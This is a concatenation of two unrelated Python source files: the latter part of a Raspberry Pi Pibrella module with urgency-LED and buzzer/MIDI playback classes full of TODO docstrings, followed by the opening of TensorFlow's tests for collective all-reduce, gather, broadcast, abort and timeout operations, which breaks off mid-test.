arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting urgency LED %s', self.Name)
self.stop()
stopListening(self)
self._timeToExit = True
self._thread.join()
# --------------------------------------------------------------------------
def computeDelay(self,
percentComplete):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
delay_ms = (1.0 - percentComplete) * self.max_period_ms + percentComplete * self.min_period_ms
logger.debug('computeDelay({}) returning {}'.format(percentComplete, delay_ms))
return delay_ms
# --------------------------------------------------------------------------
def run(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.info('Starting thread for urgency LED %s' % (self.Name))
delay_s = self.max_period_ms / 1000.0
while not self._timeToExit:
try:
if self._transitionToStarted:
now = datetime.datetime.now()
currentDelta = now - self.startTime
current_ms = int(currentDelta.total_seconds() * 1000.0)
delay_ms = self.computeDelay(current_ms * 1.0 / self.boom_ms)
delay_s = delay_ms / 1000.0
if self.flag:
self.flag = False
self.outputPin.off()
logger.debug('urgency LED \"%s\" pin off.', self.Name)
sleepDelay_s = delay_s - (self.min_period_ms / 1000.0)
else:
self.flag = True
self.outputPin.on()
logger.debug('urgency LED \"%s\" pin on.', self.Name)
sleepDelay_s = self.min_period_ms / 1000.0
logger.debug('current_ms={} vs. boom_ms={} => quotient={}, delay_ms={}, delay_s={}, sleepDelay_s={}'.format(current_ms, self.boom_ms, current_ms * 1.0 / self.boom_ms, delay_ms, delay_s, sleepDelay_s))
if current_ms >= self.boom_ms:
logger.info('Urgency LED %s transitioning to stopped.' % (self.Name))
self._transitionToStarted = False
delay_s = self.max_period_ms / 1000.0
sleepDelay_s = delay_s
logger.debug('Urgency LED thread sleeping for {} sec with flag={}.'.format(sleepDelay_s, self.flag))
else:
pass # Nothing to do
sleepDelay_s = delay_s
sleep(sleepDelay_s)
except Exception, e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in urgency LED %s: %s" % (exType.__name__, self.Name, str(e)))
traceback.print_tb(tb)
logger.info('Stopping thread for urgency LED %s' % (self.Name))
# --------------------------------------------------------------------------
def start(self,
total_epoch_ms):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
self.flag = True
self.outputPin.on()
self.startTime = datetime.datetime.now()
self.boomTime = self.startTime + datetime.timedelta(milliseconds=total_epoch_ms)
self.boomDelta = self.boomTime - self.startTime
self.boom_ms = int(self.boomDelta.total_seconds() * 1000.0)
logger.info('Urgency LED {} transitioning to started at time {} for boom at {} with total_epoch_ms={}.'.format(self.Name, self.startTime, self.boomTime, total_epoch_ms))
self._transitionToStarted = True
# --------------------------------------------------------------------------
def stop(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Stopped urgency LED \"%s\".', self.Name)
self.outputPin.off()
self._transitionToStarted = False
# ------------------------------------------------------------------------------
class Buzzer(IBuzzer):
"""
The buzzer class enables a pibrella buzzer to be play or stop a
single note, or play a preconfigured song asynchronously.
"""
# --------------------------------------------------------------------------
def __init__(self,
name,
config):
"""Initializes the Buzzer class
TODO Detailed multi-line description if
necessary.
Args:
name (string): Name of this instance of the Buzzer class. Example "Bob"
config (Config): Conifg object containing an array named Song which is an
array of configuration objects with Tone and Duration.
Where Tone is an int from 0-TBD and Duration is a number
with the duration of time in seconds.
Returns:
N/A
Raises:
N/A
"""
self.Name = name
# Copy the song to play
self._song = []
self.TotalDuration = 0
for i in config.Song:
# TODO verify there is not just a copy constructor for config
# TODO verify tone is an int and Duration is a number
tmp = Config()
isFile = False
hasTrack = False
# Depending on how used these might not be there
if hasattr(i, 'File') and i.File != None:
tmp.File = i.File
isFile = True
if hasattr(i, 'Track') and i.Track != None:
tmp.Track = i.Track
hasTrack = True
if hasattr(i, 'Tone') and i.Tone != None:
tmp.Tone = i.Tone
if hasattr(i, 'Duration') and i.Duration != None:
tmp.Duration = i.Duration
self._song.append(tmp)
if isFile and hasTrack:
if os.path.isfile(i.File):
# this is likely a midi now things get hard
try:
logger.debug('Opening midi file \"%s\".' % (i.File))
mid = MidiFile(i.File)
logger.debug('Opened midi file \"%s\".' % (i.File))
# now find the track
for track in enumerate(mid.tracks):
if hasattr(track, 'name') and track.name == i.Track:
for message in track:
if message.type == 'note_on':
# need to force data type to avoid int division
duration = 0.0 + message.time
elif message.type == 'note_off':
duration = message.time - duration
if duration > 0:
self.TotalDuration += duration/1000.0
except Exception, e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in Buzzer run" % (exType.__name__))
logger.critical(str(e))
traceback.print_tb(tb)
else:
# The file does not exist
logger.critical("The buzzer %s file %s does not exist", self.Name, i.File)
else:
# duration is easy just add em up
self.TotalDuration += i.Duration
self._setBuzzer()
self._stopPlaying = False
self._isWaitingForPlay = True
self._isCutShort = False
self._thread = Thread(target=self.run)
self._thread.start()
# --------------------------------------------------------------------------
def _setBuzzer(self):
self._buzzer = getattr(pibrella, 'buzzer')
# --------------------------------------------------------------------------
def __enter__(self):
logger.debug('Entering Buzzer')
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting Buzzer')
# This did not appear to be getting called so moved to stop
# --------------------------------------------------------------------------
def stop(self):
self.off()
self._isWaitingForPlay = True
self._stopPlaying = True
logger.debug('Before Join in Buzzer stop')
self._thread.join()
logger.debug('After Join in Buzzer stop')
# --------------------------------------------------------------------------
def play(self):
"""Asynchronously plays this Buzzer's song.
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Buzzer starting to play configured song')
if (not self._stopPlaying) and (not self._isWaitingForPlay):
# The song is already playing so need to restart it
self.off()
self._isWaitingForPlay = False
# --------------------------------------------------------------------------
def playSynchronously(self):
"""Synchronously plays this Buzzer's song.
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Buzzer starting to play configured song')
if (not self._stopPlaying) and (not self._isWaitingForPlay):
# The song is already playing so need to restart it
self.off()
self._isWaitingForPlay = True
self._playOnce()
# --------------------------------------------------------------------------
def note(self,
tone):
"""Has the buzzer hold a note unit off is called.
So pibrella docs are light but looking at it's source code would suggest
that the tone field is the standard midi value minus 69 so negative is
allowed and 0-11 would be with higher or lower values just in different
octaves:
note_key = ['A','A#','B','C','C#','D','D#','E','F','F#','G','G#']
As -49 would be below midi A0 this value is used to denote a rest.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Buzzer playing note %s' % tone)
# TODO verify tone is an int
if (not self._stopPlaying) and (not self._isWaitingForPlay):
# The song is already playing so need to stop it
self.off()
if not (tone == '-'):
self._buzzer.note(tone)
# --------------------------------------------------------------------------
def off(self):
"""Stops playing the buzzer's song or note.
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Stop playing Buzzer')
if (not self._stopPlaying) and (not self._isWaitingForPlay):
self._isCutShort = True
while self._isCutShort:
sleep(0.0001)
self._buzzer.off()
# --------------------------------------------------------------------------
def _playOnce(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
for i in self._song:
# first assess if this is a string of notes or a midi file
if hasattr(i,'File'):
# this is likely a midi
try:
mid = MidiFile(i.File)
# now find the track to play
for track in mid.tracks:
if hasattr(track, 'name') and track.name == i.Track:
for message in track:
# if asynch give a way to stop
if self._stopPlaying or self._isCutShort:
self._buzzer.off()
self._isCutShort = False #reset for next run
break
if message.type == 'note_on':
note = message.note - 69
self._buzzer.note(note)
# need to force data type to avoid int division
duration = 0.0 + message.time
elif message.type == 'note_off':
duration = message.time - duration
if duration > 0:
sleep(duration/1000.0)
self._buzzer.off()
self._buzzer.off()
except Exception, e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in Buzzer run" % (exType.__name__))
logger.critical(str(e))
traceback.print_tb(tb)
else:
try:
# if asynch give a way to stop
if self._stopPlaying or self._isCutShort:
self._buzzer.off()
isCutShort = False #reset for next run
break
if i.Tone == -49:
self._buzzer.off()
else:
self._buzzer.note(i.Tone)
sleep(i.Duration)
self._buzzer.off()
except Exception, e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in Buzzer run" % (exType.__name__))
logger.critical(str(e))
traceback.print_tb(tb)
# End for i
self._isWaitingForPlay = True
# --------------------------------------------------------------------------
def run(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
# Note doing it this way gets rid of issue of restarting a thread
# if you need to stop short, but it chews up CPU
# TODO there needs to be a better way of using a worker thread instead
# of a self thread but still be able to signal the worker thread to stop
# early without relying on a member variable.
while not self._stopPlaying:
if self._isWaitingForPlay:
sleep(0.001)
else:
self._playOnce()
logger.debug('Run over for Buzzer')
# ------------------------------------------------------------------------------
class FakeHwBuzzer():
"""
The FakeHwBuzzer class enables a pibrella buzzer interface to be simulated,
without making any noise but displaying debug info.
"""
# --------------------------------------------------------------------------
def off(self):
pass
# --------------------------------------------------------------------------
def note(self, tone):
pass
# Inheriting from Buzzer to attempt to keep this timing as close as HW as possible.
# ------------------------------------------------------------------------------
class SilentBuzzer(Buzzer):
"""
The buzzer class enables a fake console buzzer to be play or stop a
single note, or play a preconfigured song asynchronously.
"""
# --------------------------------------------------------------------------
def _setBuzzer(self):
self._buzzer = FakeHwBuzzer()
# ------------------------------------------------------------------------------
class Input(IInput):
"""
TODO class comment
"""
# --------------------------------------------------------------------------
def __init__(self,
name,
inputPin):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
name (string): Name of this input, example "lightDetector"
inputPin (string): Letter Designation of Pin , "a", "b", "c", or"d"
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
self.Name = name
self._inputPin = getattr(pibrella.input, inputPin)
# --------------------------------------------------------------------------
def read(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
return self._inputPin.read()
# ------------------------------------------------------------------------------
# Module Initialization
# ------------------------------------------------------------------------------
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
handler = logging.handlers.SysLogHandler(address = '/dev/log')
logger.addHandler(handler)
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
if communication == 'NCCL':
self.skipTest('b/170672646: it crashes with NCCL and group size one')
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(collective_op_combinations)
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there's no active collective ops. There could be
# exceptions like EOF which we expect users to catch, aborting collective
# ops on all op errors intervenes with this workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there're active collective ops at the time of
# an op error. This is due to the inability to cancel collective ops, and op
# errors may cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there're active collective ops at
# the time of an op error. We rely cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(collective_op_combinations)
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
